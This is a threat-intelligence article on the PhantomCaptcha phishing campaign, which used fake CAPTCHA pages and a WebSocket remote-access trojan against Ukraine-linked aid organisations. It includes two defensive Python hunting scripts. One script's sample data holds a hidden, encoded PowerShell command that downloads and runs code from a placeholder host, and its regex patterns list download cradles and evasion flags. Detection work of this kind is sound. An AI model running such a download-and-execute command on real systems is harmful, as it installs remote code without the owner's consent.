On October 8, 2025, a sophisticated phishing campaign, later documented by security researchers under the name PhantomCaptcha, targeted several organisations tied to Ukraine’s war-relief and reconstruction efforts. The targets included the Ukrainian office of the United Nations Children’s Fund (UNICEF), the Norwegian Refugee Council, the Council of Europe’s Register of Damage for Ukraine, and regional government administrations in Donetsk, Dnipropetrovsk, Poltava, and Mykolaiv.

Researchers from SentinelOne reported that the attackers used fake recruitment messages and spoofed official communications, with booby-trapped PDF files and bogus links that ultimately led victims to install remote-access trojans (RATs). The campaign blends social engineering with purpose-built malware in an unusually targeted way.

Most of the emails were well crafted and appeared to come from the office of Ukraine’s President, among other authoritative senders. Each carried a PDF attachment with an embedded link. Clicking the link took the victim to a fake CAPTCHA page on zoomconference.app, a domain posing as a video-conferencing platform. That page opened a WebSocket connection to a remote server to fetch a PowerShell command and then presented that command for the victim to run themselves (the so-called ClickFix technique). Nothing is exploited; the victim’s own action is what starts the malware installation.

Once the victim ran the PowerShell command, a first-stage downloader retrieved a second-stage payload from a remote server. That payload was a purpose-built RAT that uses WebSockets as its command channel to attacker-controlled infrastructure. It gave the operators full remote control of the host: file theft, monitoring, and deployment of further payloads.
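The execution step described above leaves a distinctive trace on the endpoint: a PowerShell process whose parent is the user's shell, with evasion flags and a download cradle in its command line. The following Python hunt is an added example, not code from the article or from SentinelOne's report. It scores constructed Sysmon-style process-creation records for that pattern, assuming the victim launched the command from the Run dialog or another explorer.exe-hosted path and that the downloader used the -EncodedCommand form; the sample events, the placeholder host stage.invalid, the flag list and the score threshold are all assumptions made for this example.

```python
"""Hunt Sysmon process-creation records (EventID 1) for the execution step of
the lure: a PowerShell process launched by the user's shell (explorer.exe)
with evasion flags and a download cradle. Added example; the sample events
are constructed, not real telemetry from the campaign."""
import base64
import json
import re

# Parent images that mean a person launched the process (Run dialog, Start
# menu, double-click). Assumption made for this example.
USER_SHELL_PARENTS = {"explorer.exe"}

# Flags an interactive user almost never types by hand.
EVASION_FLAGS = re.compile(
    r"(?i)(-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|-ep\s+bypass|"
    r"-executionpolicy\s+bypass|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,})"
)
# Download-and-execute primitives ("cradles") used to fetch the next stage.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)(invoke-expression|\biex\b|invoke-webrequest|\biwr\b|downloadstring|"
    r"net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b)"
)
ENCODED_ARG = re.compile(r"(?i)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def encode_command(script):
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the script hidden behind -enc/-EncodedCommand, or None if absent or invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Score one Sysmon record. Returns (score, reasons, effective command line),
    where the effective command line includes any decoded -EncodedCommand script."""
    if event.get("EventID") != 1:
        return 0, [], ""
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    cmd = event.get("CommandLine", "")
    if image not in ("powershell.exe", "pwsh.exe"):
        return 0, [], cmd
    decoded = decode_encoded_command(cmd)
    effective = cmd if decoded is None else f"{cmd} <decoded: {decoded}>"
    score, reasons = 0, []
    if parent in USER_SHELL_PARENTS:
        score += 2
        reasons.append(f"launched from {parent}")
    if EVASION_FLAGS.search(cmd):
        score += 2
        reasons.append("evasion flags")
    if decoded is not None:
        score += 1
        reasons.append("encoded command")
    if DOWNLOAD_CRADLE.search(effective):
        score += 3
        reasons.append("download cradle")
    return score, reasons, effective


def hunt_process_events(jsonl, threshold=5):
    """Run score_event over JSON-lines Sysmon events; return records at or above threshold."""
    findings = []
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        score, reasons, effective = score_event(event)
        if score >= threshold:
            findings.append({"ProcessId": event["ProcessId"], "score": score,
                             "reasons": reasons, "command": effective})
    return findings


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed sample telemetry; stage.invalid is a placeholder, not a real host.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 1, "ProcessId": 4120, "Image": PS,           # scheduled task, benign
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\cleanup.ps1"},
    {"EventID": 1, "ProcessId": 5208, "Image": PS,           # user opened a console, benign
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "\"powershell.exe\""},
    {"EventID": 1, "ProcessId": 6644, "Image": PS,           # pasted lure command
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -w hidden -ep bypass -enc "
                    + encode_command("iwr http://stage.invalid/a | iex")},
    {"EventID": 3, "ProcessId": 6644, "Image": PS, "DestinationIp": "203.0.113.10"},
])

if __name__ == "__main__":
    for finding in hunt_process_events(SAMPLE_EVENTS):
        print(finding)
```

The weighting deliberately keeps "PowerShell launched from explorer.exe" below the threshold on its own, because that is what any administrator opening a console produces; it is the combination with a hidden window, an encoded argument and a download cradle that distinguishes a pasted lure command.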

Notably, the lure domain was active for only a single day before disappearing, while preparation stretched over months, with related domain registrations dating back to March 2025. That pattern points to careful operational security and long-term planning by the attackers.

Aid groups became targets

These aren’t just random victims. The targeted parties are organisations operating in or supporting war-affected regions of Ukraine with significant international exposure, financial flows, and donor data. Access to their networks could provide attackers with valuable intelligence or leverage for further intrusions.

Threat researchers pointed out that by breaching an aid group, the attackers could gather information such as donor lists, governmental correspondence, financial records, and project data. Those assets are appealing for both espionage and financial crime. And given that some of the targets operate in regions involved in the conflict with Russia, the intrusion may serve broader strategic goals beyond simple theft.

What makes this campaign unique

Unlike mass phishing campaigns that spray thousands of emails, PhantomCaptcha was highly targeted and tailored. The first related domain was registered around March 27, 2025, which implies months of reconnaissance before the strike. The same infrastructure included “princess-mens.click”, a domain used to deliver Android data-collection apps that harvest geolocation, contacts, call logs, media, and the list of installed apps from victims’ phones.

The use of ordinary web technology (WebSockets as the RAT’s command channel), convincing landing pages, and a PowerShell chain that needs no exploit or stolen credentials, only the victim’s own keystrokes, shows the attackers were comfortable mixing social engineering, lightweight scripting, and stealth. Pairing a fake Zoom link with a CAPTCHA check supplied both urgency and a sense of legitimacy, the two key ingredients of successful phishing.

What the organisations should do now

For aid organisations, nonprofits, and any entity operating in conflict or relief zones, this attack offers several lessons:

  • Verify recruitment emails and other unsolicited official-looking messages out of band, especially when they come from unfamiliar domains or carry attachments.
  • Never enable macros, allow script execution, or follow links in documents that arrive unexpectedly, even from trusted contacts; in particular, never paste a command that a web page asks you to run into the Run dialog, a terminal, or PowerShell.
  • Monitor for WebSocket connections from non-browser processes such as PowerShell, and keep device registrations and authenticator-app enrolments under review, so that unusual outbound channels and new footholds are noticed early.
  • Treat video-conferencing platforms and donation systems as attack surface, not just communication tools: a lookalike of a trusted brand was the lure here.
  • Audit device inventories, proxy logs, and endpoint telemetry regularly for signs of intrusion, bearing in mind that an attacker with a foothold generally looks like a legitimate user.
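As a concrete version of the proxy-log check above, the following Python script is an added example, not code from the article or from SentinelOne's report. It hunts a constructed tab-separated proxy log for WebSocket handshakes (HTTP 101 Switching Protocols) that either come from a non-browser client such as PowerShell or go to a hostname that imitates a conferencing brand without belonging to it. The allowlist, the brand table, the log format, the user-agent heuristic and the sample lines are all assumptions made for this example; zoomconference.app is the lure domain named in the article, and 203.0.113.10 is a documentation-range address standing in for the RAT server.

```python
"""Hunt web-proxy logs for WebSocket handshakes (HTTP 101 Switching Protocols)
that do not look like a browser talking to a sanctioned conferencing service.
Added example; the log format and sample lines are constructed, not the
campaign's real telemetry."""
import csv
import io

# Conferencing services the organisation actually uses (assumed allowlist).
SANCTIONED = {"zoom.us", "teams.microsoft.com", "meet.google.com"}
# Brand words phishing kits put into lookalike hostnames, mapped to the domain
# that legitimately owns the brand (assumed table for this example).
IMPERSONATED_BRANDS = {"zoom": "zoom.us", "teams": "microsoft.com", "meet": "google.com"}


def registered_under(host, domain):
    """True if host is domain itself or a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def is_browser_ua(ua):
    """Rough browser check: real browsers send a long Mozilla/5.0 string;
    PowerShell's web cmdlets append 'WindowsPowerShell/', and bare socket
    clients usually send nothing at all."""
    return ua.startswith("Mozilla/") and "PowerShell" not in ua and len(ua) > 40


def score_row(row):
    """Score one proxy log row; only WebSocket handshakes (status 101) are scored."""
    if row["status"] != "101":
        return 0, []
    host = row["host"].lower()
    score, reasons = 0, []
    if not any(registered_under(host, d) for d in SANCTIONED):
        score += 1                      # weak signal on its own: many apps use WebSockets
        reasons.append("WebSocket to unsanctioned host")
    for brand, owner in IMPERSONATED_BRANDS.items():
        if brand in host and not registered_under(host, owner):
            score += 3
            reasons.append(f"hostname imitates {brand} but is not under {owner}")
    if not is_browser_ua(row["user_agent"]):
        score += 3
        reasons.append("non-browser user agent")
    return score, reasons


def hunt_proxy_log(log_text, threshold=3):
    """Parse a tab-separated proxy log with a header row and return flagged rows."""
    reader = csv.DictReader(io.StringIO(log_text), delimiter="\t")
    findings = []
    for row in reader:
        score, reasons = score_row(row)
        if score >= threshold:
            findings.append({"ts": row["ts"], "client": row["client_ip"],
                             "host": row["host"], "score": score, "reasons": reasons})
    return findings


CHROME = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
          "(KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36")
POWERSHELL = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.4046"
FIELDS = ["ts", "client_ip", "method", "host", "uri", "status", "user_agent"]
# Constructed sample log: a normal Zoom session, the lure page's WebSocket from
# the victim's browser, the RAT's channel from PowerShell, an ordinary page
# load, and a legitimate third-party WebSocket that should not be flagged.
SAMPLE_LOG = "\n".join("\t".join(r) for r in [
    FIELDS,
    ["2025-10-08T09:12:01Z", "10.0.5.21", "GET", "zoom.us", "/wc/join", "101", CHROME],
    ["2025-10-08T09:40:17Z", "10.0.5.33", "GET", "zoomconference.app", "/ws", "101", CHROME],
    ["2025-10-08T09:41:05Z", "10.0.5.33", "GET", "203.0.113.10", "/", "101", POWERSHELL],
    ["2025-10-08T10:02:44Z", "10.0.5.40", "GET", "web.whatsapp.com", "/", "200", CHROME],
    ["2025-10-08T10:15:09Z", "10.0.5.21", "GET", "wss-primary.slack.com", "/link", "101", CHROME],
])

if __name__ == "__main__":
    for finding in hunt_proxy_log(SAMPLE_LOG):
        print(finding)
```

Two of the five rows are flagged and they tell the story in order: the same client first upgrades a browser WebSocket to a Zoom lookalike, then a minute later PowerShell opens its own WebSocket to an unknown address. Correlating by client and time, as the output allows, is what turns two weak alerts into one incident.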

When the stakes are high, cybersecurity must advance accordingly. Attackers aren’t only going after financial gain anymore. They’re infiltrating organisations by combining one-to-one social engineering and tailored malware. That requires defenders to shift from “bulk preventive” tactics to “tailored response” strategies.

The PhantomCaptcha campaign shows that even trusted institutions in humanitarian roles remain exposed to complex attacks. Its reliance on lookalikes of familiar platforms such as Zoom and on fake CAPTCHA checks shows how infrastructure people assume is safe can be turned against them. Defending in this environment means constant verification, not assumption.
